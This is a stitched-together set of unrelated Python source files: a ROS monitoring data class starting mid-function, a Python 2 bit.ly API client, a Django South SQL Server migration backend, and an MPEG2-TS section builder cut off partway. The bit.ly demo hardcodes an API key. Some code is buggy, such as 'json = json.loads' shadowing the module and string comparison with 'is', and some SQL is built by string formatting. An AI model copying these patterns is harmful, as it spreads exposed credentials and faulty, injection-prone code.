for j in range(0, len(entries_to_delete["window_stop"])):
for value in self._rated_data.values():
try:
del value[0]
except IndexError:
j += 1
self._length_of_rated_data -= i
def get_items_younger_than(self, time, *args):
"""
Returns all entries that are younger than time either in all keys of self._data or if args not empty in
all key corresponding to args.
Warning: Method assumes data is sorted by time if this is not true will return too few or too much data.
:param time: the lower bound in seconds
:type time: rospy.Time
:param args: the keys to the dict
:type args: str
:returns: dict of lists
:rtype: dict
:raises KeyError: if an element in args cannot be found in any of the dictionaries (data vs rated data)
"""
self._data_lock.acquire()
return_values = {}
if args:
for key in args:
return_values[key] = None
if "window_stop" not in args:
return_values["window_stop"] = None
else:
return_values["window_stop"] = None
for key in self._data:
return_values[key] = None
breakpoint = 0
list_of_time = self._data["window_stop"]
length = len(list_of_time)
if length is not 0:
if list_of_time[0] >= time:
for key in return_values:
try:
return_values[key] = self._data[key][:]
except KeyError:
print("Accessed key was: " + key + ". Available keys are: ")
print(self._data)
raise
else:
for i in range(length - 1, -1, -1):
if list_of_time[i] < time:
breakpoint = i + 1
for key in return_values:
if key in self._data:
return_values[key] = self._data[key][breakpoint:length]
else:
raise IndexError("IndexError! length of the list %s, accessed index %s. length of data"
" at given point %s, key is %s", length, i, len(self._data[key]), key)
break
self._data_lock.release()
return return_values
def get_rated_items_younger_than(self, time, *args):
"""
Returns all entries that are younger than time either in all keys of self._rated_data or if args not empty in
all key corresponding to args.
Warning: Method assumes data is sorted by time if this is not true will return too few or too much data.
:param time: the lower bound in seconds
:type time: rospy.Time
:param args: the keys to the dict
:type args: str
:returns: dict of lists
:rtype: dict
:raises KeyError: if an element in args cannot be found in any of the dictionaries (data vs rated data)
"""
return_values = {}
if args:
for key in args:
return_values[key] = None
if "window_stop" not in args:
return_values["window_stop"] = None
else:
for key in self._rated_data:
return_values[key] = None
return_values["state"] = None
breakpoint = 0
list_of_time = self._rated_data["window_stop"]
length = len(list_of_time)
if length is not 0:
if list_of_time[0] >= time:
for key in return_values:
if key is 'state':
return_values[key] = self.__state
else:
try:
return_values[key] = self._rated_data[key]
except KeyError:
print("Accessed key was: " + key + ". Available keys are: ")
print(self._rated_data)
raise
else:
for i in range(length - 1, -1, -1):
if list_of_time[i] < time:
breakpoint = i + 1
for key in return_values:
if key in self._rated_data:
return_values[key] = self._rated_data[key][breakpoint:length]
elif key is "state":
return_values[key] = self.__state[breakpoint:length]
else:
raise IndexError("IndexError! length of the list %s, accessed index %s. length of data"
" at given point %s, key is %s", length, i, len(self._data[key]), key)
break
return return_values
def execute_action(self, action):
"""
Executes a action on the current item like stop or restart. Calls to this method should be redirected to the remote host on executed there.
:param action: the action which should be executed
:type action: RemoteAction
"""
pass
def get_detailed_data(self):
"""
Returns detailed description of current state as html text. Has to be implemented in subclasses.
:returns: detailed data
:return: str
"""
raise NotImplementedError()
def get_plotable_items(self):
"""
Returns the plotable entries in the item. Has to be implemented in subclasses.
:return: list of the items(str)
:rtype: list
"""
raise NotImplementedError()
def get_erroneous_entries(self):
"""
Returns the erroneous entries as a html string
:returns: an html string containing the erroneous entries yet preformatted
:rtype: str
"""
self._data_lock.acquire()
content = "<p class=\"get_erroneous_entries\">"
return_values = {}
if self.__state:
if self.get_state() is not "ok" and self.get_state() is not "unknown":
if self._rated_data["alive.state"]:
if self._rated_data["alive.state"][-1] is "high" or self._rated_data["alive.state"][-1] is "low":
content += self.tr("alive actual_value:") + \
" <span class=\"erroneous_entry\">" + prepare_number_for_representation(
self._rated_data["alive.actual_value"][-1][0]) + "</span>" + \
"<br>"
content += self.tr("alive expected_value:") + \
" <span class=\"erroneous_entry\">" + str(
self._rated_data["alive.expected_value"][-1][0]) + "</span>" + \
"<br>"
content += self.tr("alive state:") + \
" <span class=\"erroneous_entry\">" + str(
self._rated_data["alive.state"][-1]) + "</span>" + "<br>"
for entry in self._attributes:
if self._rated_data[entry + ".state"]:
if self._rated_data[entry + ".state"][-1] is "high" or self._rated_data[entry + ".state"][
-1] is "low":
content += self.tr(entry) + \
self.tr(" actual_value:") + \
" <span class=\"erroneous_entry\">" + prepare_number_for_representation(
self._rated_data[entry + ".actual_value"][-1][0]) + "</span> " + \
self.tr(entry + "_unit") + "<br>"
content += self.tr(entry) + \
self.tr(" expected_value:") + \
" <span class=\"erroneous_entry\">" + str(
self._rated_data[entry + ".expected_value"][-1][0]) + "</span> " + \
self.tr(entry + "_unit") + "<br>"
content += self.tr(entry) + \
self.tr(" state:") + \
" <span class=\"erroneous_entry\">" + str(
self._rated_data[entry + ".state"][-1]) + "</span>" + "<br>"
content += "<br>"
content += "</p>"
self._data_lock.release()
return content
def can_execute_actions(self):
"""
This item cannot execute actions
:return: False
"""
return False
def get_short_data(self):
return self.get_erroneous_entries_for_log()
def get_erroneous_entries_for_log(self):
"""
Returns the erroneous entries for the log as a string
:returns: an string containing the erroneous entries yet preformatted
:rtype: str
"""
self._data_lock.acquire()
content = ""
if len(self._rated_data["window_stop"]) != 0:
if self.get_state() is not "ok" and self.get_state() is not "unknown":
if self._rated_data["alive.state"][-1] == "high" or self._rated_data["alive.state"][-1] == "low":
content += self.tr("alive") + ": " + str(self._rated_data["alive.actual_value"][-1][-1]) + ", "
for entry in self._attributes:
if self._rated_data[entry + ".state"]:
if self._rated_data[entry + ".state"][-1] == "high" or self._rated_data[entry + ".state"][-1] is "low":
content += self.tr(entry) + ": " + str(self._rated_data[entry + ".state"][-1]) + ", "
else:
return "Not sufficient rated data yet"
self._data_lock.release()
return content
| |
#!/usr/bin/python2.4
#
# Copyright 2009 Empeeric LTD. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import urllib,urllib2
import urlparse
import string
BITLY_BASE_URL = "http://api.bit.ly/"
BITLY_API_VERSION = "2.0.1"
VERBS_PARAM = {
'shorten':'longUrl',
'expand':'shortUrl',
'info':'shortUrl',
'stats':'shortUrl',
'errors':'',
}
class BitlyError(Exception):
'''Base class for bitly errors'''
@property
def message(self):
'''Returns the first argument used to construct this error.'''
return self.args[0]
class Api(object):
""" API class for bit.ly """
def __init__(self, login, apikey):
self.login = login
self.apikey = apikey
self._urllib = urllib2
def shorten(self,longURLs,params={}):
"""
Takes either:
A long URL string and returns shortened URL string
Or a list of long URL strings and returns a list of shortened URL strings.
"""
want_result_list = True
if not isinstance(longURLs, list):
longURLs = [longURLs]
want_result_list = False
for index,url in enumerate(longURLs):
if not '://' in url:
longURLs[index] = "http://" + url
request = self._getURL("shorten",longURLs,params)
result = self._fetchUrl(request)
json = json.loads(result)
self._CheckForError(json)
results = json['results']
res = [self._extract_short_url(results[url]) for url in longURLs]
if want_result_list:
return res
else:
return res[0]
def _extract_short_url(self,item):
if item['shortKeywordUrl'] == "":
return item['shortUrl']
else:
return item['shortKeywordUrl']
def expand(self,shortURL,params={}):
""" Given a bit.ly url or hash, return long source url """
request = self._getURL("expand",shortURL,params)
result = self._fetchUrl(request)
json = json.loads(result)
self._CheckForError(json)
return json['results'][string.split(shortURL, '/')[-1]]['longUrl']
def info(self,shortURL,params={}):
"""
Given a bit.ly url or hash,
return information about that page,
such as the long source url
"""
request = self._getURL("info",shortURL,params)
result = self._fetchUrl(request)
json = json.loads(result)
self._CheckForError(json)
return json['results'][string.split(shortURL, '/')[-1]]
def stats(self,shortURL,params={}):
""" Given a bit.ly url or hash, return traffic and referrer data. """
request = self._getURL("stats",shortURL,params)
result = self._fetchUrl(request)
json = json.loads(result)
self._CheckForError(json)
return Stats.NewFromJsonDict(json['results'])
def errors(self,params={}):
""" Get a list of bit.ly API error codes. """
request = self._getURL("errors","",params)
result = self._fetchUrl(request)
json = json.loads(result)
self._CheckForError(json)
return json['results']
def setUrllib(self, urllib):
'''Override the default urllib implementation.
Args:
urllib: an instance that supports the same API as the urllib2 module
'''
self._urllib = urllib
def _getURL(self,verb,paramVal,more_params={}):
if not isinstance(paramVal, list):
paramVal = [paramVal]
params = {
'version':BITLY_API_VERSION,
'format':'json',
'login':self.login,
'apiKey':self.apikey,
}
params.update(more_params)
params = params.items()
verbParam = VERBS_PARAM[verb]
if verbParam:
for val in paramVal:
params.append(( verbParam,val ))
encoded_params = urllib.urlencode(params)
return "%s%s?%s" % (BITLY_BASE_URL,verb,encoded_params)
def _fetchUrl(self,url):
'''Fetch a URL
Args:
url: The URL to retrieve
Returns:
A string containing the body of the response.
'''
# Open and return the URL
url_data = self._urllib.urlopen(url).read()
return url_data
def _CheckForError(self, data):
"""Raises a BitlyError if bitly returns an error message.
Args:
data: A python dict created from the bitly json response
Raises:
BitlyError wrapping the bitly error message if one exists.
"""
# bitly errors are relatively unlikely, so it is faster
# to check first, rather than try and catch the exception
if 'ERROR' in data or data['statusCode'] == 'ERROR':
raise BitlyError, data['errorMessage']
for key in data['results']:
if type(data['results']) is dict and type(data['results'][key]) is dict:
if 'statusCode' in data['results'][key] and data['results'][key]['statusCode'] == 'ERROR':
raise BitlyError, data['results'][key]['errorMessage']
class Stats(object):
'''A class representing the Statistics returned by the bitly api.
The Stats structure exposes the following properties:
status.user_clicks # read only
status.clicks # read only
'''
def __init__(self,user_clicks=None,total_clicks=None):
self.user_clicks = user_clicks
self.total_clicks = total_clicks
@staticmethod
def NewFromJsonDict(data):
'''Create a new instance based on a JSON dict.
Args:
data: A JSON dict, as converted from the JSON in the bitly API
Returns:
A bitly.Stats instance
'''
return Stats(user_clicks=data.get('userClicks', None),
total_clicks=data.get('clicks', None))
if __name__ == '__main__':
testURL1="www.yahoo.com"
testURL2="www.cnn.com"
a=Api(login="pythonbitly",apikey="R_06871db6b7fd31a4242709acaf1b6648")
short=a.shorten(testURL1)
print "Short URL = %s" % short
short=a.shorten(testURL1,{'history':1})
print "Short URL with history = %s" % short
urlList=[testURL1,testURL2]
shortList=a.shorten(urlList)
print "Short URL list = %s" % shortList
long=a.expand(short)
print "Expanded URL = %s" % long
info=a.info(short)
print "Info: %s" % info
stats=a.stats(short)
print "User clicks %s, total clicks: %s" % (stats.user_clicks,stats.total_clicks)
errors=a.errors()
print "Errors: %s" % errors
testURL3=["www.google.com"]
short=a.shorten(testURL3)
print "Short url in list = %s" % short
| |
from datetime import date, datetime, time
from warnings import warn
from django.db import models
from django.db.models import fields
from south.db import generic
from south.db.generic import delete_column_constraints, invalidate_table_constraints, copy_column_constraints
from south.exceptions import ConstraintDropped
class DatabaseOperations(generic.DatabaseOperations):
"""
django-pyodbc (sql_server.pyodbc) implementation of database operations.
"""
backend_name = "pyodbc"
add_column_string = 'ALTER TABLE %s ADD %s;'
alter_string_set_type = 'ALTER COLUMN %(column)s %(type)s'
alter_string_set_null = 'ALTER COLUMN %(column)s %(type)s NULL'
alter_string_drop_null = 'ALTER COLUMN %(column)s %(type)s NOT NULL'
allows_combined_alters = False
drop_index_string = 'DROP INDEX %(index_name)s ON %(table_name)s'
drop_constraint_string = 'ALTER TABLE %(table_name)s DROP CONSTRAINT %(constraint_name)s'
delete_column_string = 'ALTER TABLE %s DROP COLUMN %s'
#create_check_constraint_sql = "ALTER TABLE %(table)s " + \
# generic.DatabaseOperations.add_check_constraint_fragment
create_foreign_key_sql = "ALTER TABLE %(table)s ADD CONSTRAINT %(constraint)s " + \
"FOREIGN KEY (%(column)s) REFERENCES %(target)s"
create_unique_sql = "ALTER TABLE %(table)s ADD CONSTRAINT %(constraint)s UNIQUE (%(columns)s)"
default_schema_name = "dbo"
has_booleans = False
@delete_column_constraints
def delete_column(self, table_name, name):
q_table_name, q_name = (self.quote_name(table_name), self.quote_name(name))
# Zap the indexes
for ind in self._find_indexes_for_column(table_name,name):
params = {'table_name':q_table_name, 'index_name': ind}
sql = self.drop_index_string % params
self.execute(sql, [])
# Zap the constraints
for const in self._find_constraints_for_column(table_name,name):
params = {'table_name':q_table_name, 'constraint_name': const}
sql = self.drop_constraint_string % params
self.execute(sql, [])
# Zap default if exists
drop_default = self.drop_column_default_sql(table_name, name)
if drop_default:
sql = "ALTER TABLE [%s] %s" % (table_name, drop_default)
self.execute(sql, [])
# Finally zap the column itself
self.execute(self.delete_column_string % (q_table_name, q_name), [])
def _find_indexes_for_column(self, table_name, name):
"Find the indexes that apply to a column, needed when deleting"
sql = """
SELECT si.name, si.id, sik.colid, sc.name
FROM dbo.sysindexes SI WITH (NOLOCK)
INNER JOIN dbo.sysindexkeys SIK WITH (NOLOCK)
ON SIK.id = Si.id
AND SIK.indid = SI.indid
INNER JOIN dbo.syscolumns SC WITH (NOLOCK)
ON SI.id = SC.id
AND SIK.colid = SC.colid
WHERE SI.indid !=0
AND Si.id = OBJECT_ID('%s')
AND SC.name = '%s'
"""
idx = self.execute(sql % (table_name, name), [])
return [i[0] for i in idx]
def _find_constraints_for_column(self, table_name, name, just_names=True):
"""
Find the constraints that apply to a column, needed when deleting. Defaults not included.
This is more general than the parent _constraints_affecting_columns, as on MSSQL this
includes PK and FK constraints.
"""
sql = """
SELECT CC.[CONSTRAINT_NAME]
,TC.[CONSTRAINT_TYPE]
,CHK.[CHECK_CLAUSE]
,RFD.TABLE_SCHEMA
,RFD.TABLE_NAME
,RFD.COLUMN_NAME
-- used for normalized names
,CC.TABLE_NAME
,CC.COLUMN_NAME
FROM [INFORMATION_SCHEMA].[TABLE_CONSTRAINTS] TC
JOIN INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE CC
ON TC.CONSTRAINT_CATALOG = CC.CONSTRAINT_CATALOG
AND TC.CONSTRAINT_SCHEMA = CC.CONSTRAINT_SCHEMA
AND TC.CONSTRAINT_NAME = CC.CONSTRAINT_NAME
LEFT JOIN INFORMATION_SCHEMA.CHECK_CONSTRAINTS CHK
ON CHK.CONSTRAINT_CATALOG = CC.CONSTRAINT_CATALOG
AND CHK.CONSTRAINT_SCHEMA = CC.CONSTRAINT_SCHEMA
AND CHK.CONSTRAINT_NAME = CC.CONSTRAINT_NAME
AND 'CHECK' = TC.CONSTRAINT_TYPE
LEFT JOIN INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS REF
ON REF.CONSTRAINT_CATALOG = CC.CONSTRAINT_CATALOG
AND REF.CONSTRAINT_SCHEMA = CC.CONSTRAINT_SCHEMA
AND REF.CONSTRAINT_NAME = CC.CONSTRAINT_NAME
AND 'FOREIGN KEY' = TC.CONSTRAINT_TYPE
LEFT JOIN INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE RFD
ON RFD.CONSTRAINT_CATALOG = REF.UNIQUE_CONSTRAINT_CATALOG
AND RFD.CONSTRAINT_SCHEMA = REF.UNIQUE_CONSTRAINT_SCHEMA
AND RFD.CONSTRAINT_NAME = REF.UNIQUE_CONSTRAINT_NAME
WHERE CC.CONSTRAINT_CATALOG = CC.TABLE_CATALOG
AND CC.CONSTRAINT_SCHEMA = CC.TABLE_SCHEMA
AND CC.TABLE_CATALOG = %s
AND CC.TABLE_SCHEMA = %s
AND CC.TABLE_NAME = %s
AND CC.COLUMN_NAME = %s
"""
db_name = self._get_setting('name')
schema_name = self._get_schema_name()
table = self.execute(sql, [db_name, schema_name, table_name, name])
if just_names:
return [r[0] for r in table]
all = {}
for r in table:
cons_name, type = r[:2]
if type=='PRIMARY KEY' or type=='UNIQUE':
cons = all.setdefault(cons_name, (type,[]))
cons[1].append(r[7])
elif type=='CHECK':
cons = (type, r[2])
elif type=='FOREIGN KEY':
if cons_name in all:
raise NotImplementedError("Multiple-column foreign keys are not supported")
else:
cons = (type, r[3:6])
else:
raise NotImplementedError("Don't know how to handle constraints of type "+ type)
all[cons_name] = cons
return all
@invalidate_table_constraints
def alter_column(self, table_name, name, field, explicit_name=True, ignore_constraints=False):
"""
Alters the given column name so it will match the given field.
Note that conversion between the two by the database must be possible.
Will not automatically add _id by default; to have this behavour, pass
explicit_name=False.
@param table_name: The name of the table to add the column to
@param name: The name of the column to alter
@param field: The new field definition to use
"""
self._fix_field_definition(field)
if not ignore_constraints:
qn = self.quote_name
sch = qn(self._get_schema_name())
tab = qn(table_name)
table = ".".join([sch, tab])
constraints = self._find_constraints_for_column(table_name, name, False)
for constraint in constraints.keys():
params = dict(table_name = table,
constraint_name = qn(constraint))
sql = self.drop_constraint_string % params
self.execute(sql, [])
ret_val = super(DatabaseOperations, self).alter_column(table_name, name, field, explicit_name, ignore_constraints=True)
if not ignore_constraints:
unique_field_handled = False
for cname, (ctype,args) in constraints.items():
params = dict(table = table,
constraint = qn(cname))
if ctype=='UNIQUE':
if len(args)==1:
unique_field_handled = True #
if len(args)>1 or field.unique:
params['columns'] = ", ".join(map(qn,args))
sql = self.create_unique_sql % params
else:
continue
elif ctype=='PRIMARY KEY':
params['columns'] = ", ".join(map(qn,args))
sql = self.create_primary_key_string % params
elif ctype=='FOREIGN KEY':
continue
# Foreign keys taken care of below
#target = "%s.%s(%s)" % tuple(map(qn,args))
#params.update(column = qn(name), target = target)
#sql = self.create_foreign_key_sql % params
elif ctype=='CHECK':
warn(ConstraintDropped("CHECK "+ args, table_name, name))
continue
#TODO: Some check constraints should be restored; but not before the generic
# backend restores them.
#params['check'] = args
#sql = self.create_check_constraint_sql % params
else:
raise NotImplementedError("Don't know how to handle constraints of type "+ type)
self.execute(sql, [])
# Create unique constraint if necessary
if field.unique and not unique_field_handled:
self.create_unique(table_name, (name,))
# Create foreign key if necessary
if field.rel and self.supports_foreign_keys:
self.execute(
self.foreign_key_sql(
table_name,
field.column,
field.rel.to._meta.db_table,
field.rel.to._meta.get_field(field.rel.field_name).column
)
)
return ret_val
def _alter_set_defaults(self, field, name, params, sqls):
"Subcommand of alter_column that sets default values (overrideable)"
# First drop the current default if one exists
table_name = self.quote_name(params['table_name'])
drop_default = self.drop_column_default_sql(table_name, name)
if drop_default:
sqls.append((drop_default, []))
# Next, set any default
if field.has_default():
default = field.get_default()
literal = self._value_to_unquoted_literal(field, default)
sqls.append(('ADD DEFAULT %s for %s' % (self._quote_string(literal), self.quote_name(name),), []))
def _value_to_unquoted_literal(self, field, value):
# Start with the field's own translation
conn = self._get_connection()
value = field.get_db_prep_save(value, connection=conn)
# This is still a Python object -- nobody expects to need a literal.
if isinstance(value, basestring):
return smart_unicode(value)
elif isinstance(value, (date,time,datetime)):
return value.isoformat()
else:
#TODO: Anybody else needs special translations?
return str(value)
def _default_value_workaround(self, value):
if isinstance(value, (date,time,datetime)):
return value.isoformat()
else:
return super(DatabaseOperations, self)._default_value_workaround(value)
def _quote_string(self, s):
return "'" + s.replace("'","''") + "'"
def drop_column_default_sql(self, table_name, name, q_name=None):
"MSSQL specific drop default, which is a pain"
sql = """
SELECT object_name(cdefault)
FROM syscolumns
WHERE id = object_id('%s')
AND name = '%s'
"""
cons = self.execute(sql % (table_name, name), [])
if cons and cons[0] and cons[0][0]:
return "DROP CONSTRAINT %s" % cons[0][0]
return None
def _fix_field_definition(self, field):
if isinstance(field, (fields.BooleanField, fields.NullBooleanField)):
if field.default == True:
field.default = 1
if field.default == False:
field.default = 0
# This is copied from South's generic add_column, with two modifications:
# 1) The sql-server-specific call to _fix_field_definition
# 2) Removing a default, when needed, by calling drop_default and not the more general alter_column
@invalidate_table_constraints
def add_column(self, table_name, name, field, keep_default=True):
"""
Adds the column 'name' to the table 'table_name'.
Uses the 'field' paramater, a django.db.models.fields.Field instance,
to generate the necessary sql
@param table_name: The name of the table to add the column to
@param name: The name of the column to add
@param field: The field to use
"""
self._fix_field_definition(field)
sql = self.column_sql(table_name, name, field)
if sql:
params = (
self.quote_name(table_name),
sql,
)
sql = self.add_column_string % params
self.execute(sql)
# Now, drop the default if we need to
if not keep_default and field.default is not None:
field.default = fields.NOT_PROVIDED
#self.alter_column(table_name, name, field, explicit_name=False, ignore_constraints=True)
self.drop_default(table_name, name, field)
@invalidate_table_constraints
def drop_default(self, table_name, name, field):
fragment = self.drop_column_default_sql(table_name, name)
if fragment:
table_name = self.quote_name(table_name)
sql = " ".join(["ALTER TABLE", table_name, fragment])
self.execute(sql)
@invalidate_table_constraints
def create_table(self, table_name, field_defs):
# Tweak stuff as needed
for _, f in field_defs:
self._fix_field_definition(f)
# Run
generic.DatabaseOperations.create_table(self, table_name, field_defs)
def _find_referencing_fks(self, table_name):
"MSSQL does not support cascading FKs when dropping tables, we need to implement."
# FK -- Foreign Keys
# UCTU -- Unique Constraints Table Usage
# FKTU -- Foreign Key Table Usage
# (last two are both really CONSTRAINT_TABLE_USAGE, different join conditions)
sql = """
SELECT FKTU.TABLE_SCHEMA as REFING_TABLE_SCHEMA,
FKTU.TABLE_NAME as REFING_TABLE_NAME,
FK.[CONSTRAINT_NAME] as FK_NAME
FROM [INFORMATION_SCHEMA].[REFERENTIAL_CONSTRAINTS] FK
JOIN [INFORMATION_SCHEMA].[CONSTRAINT_TABLE_USAGE] UCTU
ON FK.UNIQUE_CONSTRAINT_CATALOG = UCTU.CONSTRAINT_CATALOG and
FK.UNIQUE_CONSTRAINT_NAME = UCTU.CONSTRAINT_NAME and
FK.UNIQUE_CONSTRAINT_SCHEMA = UCTU.CONSTRAINT_SCHEMA
JOIN [INFORMATION_SCHEMA].[CONSTRAINT_TABLE_USAGE] FKTU
ON FK.CONSTRAINT_CATALOG = FKTU.CONSTRAINT_CATALOG and
FK.CONSTRAINT_NAME = FKTU.CONSTRAINT_NAME and
FK.CONSTRAINT_SCHEMA = FKTU.CONSTRAINT_SCHEMA
WHERE FK.CONSTRAINT_CATALOG = %s
AND UCTU.TABLE_SCHEMA = %s -- REFD_TABLE_SCHEMA
AND UCTU.TABLE_NAME = %s -- REFD_TABLE_NAME
"""
db_name = self._get_setting('name')
schema_name = self._get_schema_name()
return self.execute(sql, [db_name, schema_name, table_name])
@invalidate_table_constraints
def delete_table(self, table_name, cascade=True):
"""
Deletes the table 'table_name'.
"""
if cascade:
refing = self._find_referencing_fks(table_name)
for schmea, table, constraint in refing:
table = ".".join(map (self.quote_name, [schmea, table]))
params = dict(table_name = table,
constraint_name = self.quote_name(constraint))
sql = self.drop_constraint_string % params
self.execute(sql, [])
cascade = False
super(DatabaseOperations, self).delete_table(table_name, cascade)
@copy_column_constraints
@delete_column_constraints
def rename_column(self, table_name, old, new):
"""
Renames the column of 'table_name' from 'old' to 'new'.
WARNING - This isn't transactional on MSSQL!
"""
if old == new:
# No Operation
return
# Examples on the MS site show the table name not being quoted...
params = (table_name, self.quote_name(old), self.quote_name(new))
self.execute("EXEC sp_rename '%s.%s', %s, 'COLUMN'" % params)
@invalidate_table_constraints
def rename_table(self, old_table_name, table_name):
"""
Renames the table 'old_table_name' to 'table_name'.
WARNING - This isn't transactional on MSSQL!
"""
if old_table_name == table_name:
# No Operation
return
params = (self.quote_name(old_table_name), self.quote_name(table_name))
self.execute('EXEC sp_rename %s, %s' % params)
_db_type_for_alter_column = generic.alias("_db_positive_type_for_alter_column")
_alter_add_column_mods = generic.alias("_alter_add_positive_check")
@invalidate_table_constraints
def delete_foreign_key(self, table_name, column):
super(DatabaseOperations, self).delete_foreign_key(table_name, column)
# A FK also implies a non-unique index
find_index_sql = """
SELECT i.name -- s.name, t.name, c.name
FROM sys.tables t
INNER JOIN sys.schemas s ON t.schema_id = s.schema_id
INNER JOIN sys.indexes i ON i.object_id = t.object_id
INNER JOIN sys.index_columns ic ON ic.object_id = t.object_id
INNER JOIN sys.columns c ON c.object_id = t.object_id
AND ic.column_id = c.column_id
WHERE i.is_unique=0 AND i.is_primary_key=0 AND i.is_unique_constraint=0
AND s.name = %s
AND t.name = %s
AND c.name = %s
"""
schema = self._get_schema_name()
indexes = self.execute(find_index_sql, [schema, table_name, column])
qn = self.quote_name
for index in (i[0] for i in indexes):
self.execute("DROP INDEX %s on %s.%s" % (qn(index), qn(schema), qn(table_name) ))
| |
"""section builder
Provides a set of functions to build a basic MPEG2-TS PSI section.
"""
CRC32 = [
0x00000000, 0x04c11db7, 0x09823b6e, 0x0d4326d9, 0x130476dc, 0x17c56b6b,
0x1a864db2, 0x1e475005, 0x2608edb8, 0x22c9f00f, 0x2f8ad6d6, 0x2b4bcb61,
0x350c9b64, 0x31cd86d3, 0x3c8ea00a, 0x384fbdbd, 0x4c11db70, 0x48d0c6c7,
0x4593e01e, 0x4152fda9, 0x5f15adac, 0x5bd4b01b, 0x569796c2, 0x52568b75,
0x6a1936c8, 0x6ed82b7f, 0x639b0da6, 0x675a1011, 0x791d4014, 0x7ddc5da3,
0x709f7b7a, 0x745e66cd, 0x9823b6e0, 0x9ce2ab57, 0x91a18d8e, 0x95609039,
0x8b27c03c, 0x8fe6dd8b, 0x82a5fb52, 0x8664e6e5, 0xbe2b5b58, 0xbaea46ef,
0xb7a96036, 0xb3687d81, 0xad2f2d84, 0xa9ee3033, 0xa4ad16ea, 0xa06c0b5d,
0xd4326d90, 0xd0f37027, 0xddb056fe, 0xd9714b49, 0xc7361b4c, 0xc3f706fb,
0xceb42022, 0xca753d95, 0xf23a8028, 0xf6fb9d9f, 0xfbb8bb46, 0xff79a6f1,
0xe13ef6f4, 0xe5ffeb43, 0xe8bccd9a, 0xec7dd02d, 0x34867077, 0x30476dc0,
0x3d044b19, 0x39c556ae, 0x278206ab, 0x23431b1c, 0x2e003dc5, 0x2ac12072,
0x128e9dcf, 0x164f8078, 0x1b0ca6a1, 0x1fcdbb16, 0x018aeb13, 0x054bf6a4,
0x0808d07d, 0x0cc9cdca, 0x7897ab07, 0x7c56b6b0, 0x71159069, 0x75d48dde,
0x6b93dddb, 0x6f52c06c, 0x6211e6b5, 0x66d0fb02, 0x5e9f46bf, 0x5a5e5b08,
0x571d7dd1, 0x53dc6066, 0x4d9b3063, 0x495a2dd4, 0x44190b0d, 0x40d816ba,
0xaca5c697, 0xa864db20, 0xa527fdf9, 0xa1e6e04e, 0xbfa1b04b, 0xbb60adfc,
0xb6238b25, 0xb2e29692, 0x8aad2b2f, 0x8e6c3698, 0x832f1041, 0x87ee0df6,
0x99a95df3, 0x9d684044, 0x902b669d, 0x94ea7b2a, 0xe0b41de7, 0xe4750050,
0xe9362689, 0xedf73b3e, 0xf3b06b3b, 0xf771768c, 0xfa325055, 0xfef34de2,
0xc6bcf05f, 0xc27dede8, 0xcf3ecb31, 0xcbffd686, 0xd5b88683, 0xd1799b34,
0xdc3abded, 0xd8fba05a, 0x690ce0ee, 0x6dcdfd59, 0x608edb80, 0x644fc637,
0x7a089632, 0x7ec98b85, 0x738aad5c, 0x774bb0eb, 0x4f040d56, 0x4bc510e1,
0x46863638, 0x42472b8f, 0x5c007b8a, 0x58c1663d, 0x558240e4, 0x51435d53,
0x251d3b9e, 0x21dc2629, 0x2c9f00f0, 0x285e1d47, 0x36194d42, 0x32d850f5,
0x3f9b762c, 0x3b5a6b9b, 0x0315d626, 0x07d4cb91, 0x0a97ed48, 0x0e56f0ff,
0x1011a0fa, 0x14d0bd4d, 0x19939b94, 0x1d528623, 0xf12f560e, 0xf5ee4bb9,
0xf8ad6d60, 0xfc6c70d7, 0xe22b20d2, 0xe6ea3d65, 0xeba91bbc, 0xef68060b,
0xd727bbb6, 0xd3e6a601, 0xdea580d8, 0xda649d6f, 0xc423cd6a, 0xc0e2d0dd,
0xcda1f604, 0xc960ebb3, 0xbd3e8d7e, 0xb9ff90c9, 0xb4bcb610, 0xb07daba7,
0xae3afba2, 0xaafbe615, 0xa7b8c0cc, 0xa379dd7b, 0x9b3660c6, 0x9ff77d71,
0x92b45ba8, 0x9675461f, 0x8832161a, 0x8cf30bad, 0x81b02d74, 0x857130c3,
0x5d8a9099, 0x594b8d2e, 0x5408abf7, 0x50c9b640, 0x4e8ee645, 0x4a4ffbf2,
0x470cdd2b, 0x43cdc09c, 0x7b827d21, 0x7f436096, 0x7200464f, 0x76c15bf8,
0x68860bfd, 0x6c47164a, 0x61043093, 0x65c52d24, 0x119b4be9, 0x155a565e,
0x18197087, 0x1cd86d30, 0x029f3d35, 0x065e2082, 0x0b1d065b, 0x0fdc1bec,
0x3793a651, 0x3352bbe6, 0x3e119d3f, 0x3ad08088, 0x2497d08d, 0x2056cd3a,
0x2d15ebe3, 0x29d4f654, 0xc5a92679, 0xc1683bce, 0xcc2b1d17, 0xc8ea00a0,
0xd6ad50a5, 0xd26c4d12, 0xdf2f6bcb, 0xdbee767c, 0xe3a1cbc1, 0xe760d676,
0xea23f0af, 0xeee2ed18, 0xf0a5bd1d, 0xf464a0aa, 0xf9278673, 0xfde69bc4,
0x89b8fd09, 0x8d79e0be, 0x803ac667, 0x84fbdbd0, 0x9abc8bd5, 0x9e7d9662,
0x933eb0bb, 0x97ffad0c, 0xafb010b1, 0xab710d06, 0xa6322bdf, 0xa2f33668,
0xbcb4666d, 0xb8757bda, 0xb5365d03, 0xb1f740b4]
def create_section_data_block(data_length):
"""Create a block of data to represend a section
Creates a list of the given size and returns it. The list will have every
byte set to 0xff. This is because reserved bits are normally set to 1
Arguments:
data_length -- amount of bytes needed for the data block
Returns:
A list of bytes of the desired length with zero in every byte
"""
data = [0xff] * data_length
return data
def set_table_id(data, table_id):
"""Set the Table ID in a Section
Given a block of section data, sets the Table ID
Arguments:
data -- List of bytes. Data to manipulate
table_id -- the table id to set
Returns:
table id that was set
"""
data[0] = table_id
return table_id
def set_section_syntax_indicator(data, indicator):
"""Set the section syntax indicator in a Section
Given a block of section data, sets the section syntax indicator
Arguments:
data -- List of bytes. Data to manipulate
indicator -- Boolean value to set the indicator to
"""
data[1] = data[1] & int ('01111111', 2)
if indicator: data[1] = data[1] | int ('10000000', 2)
def set_private_indicator(data, indicator):
"""Sets the private section indicator in the given section data
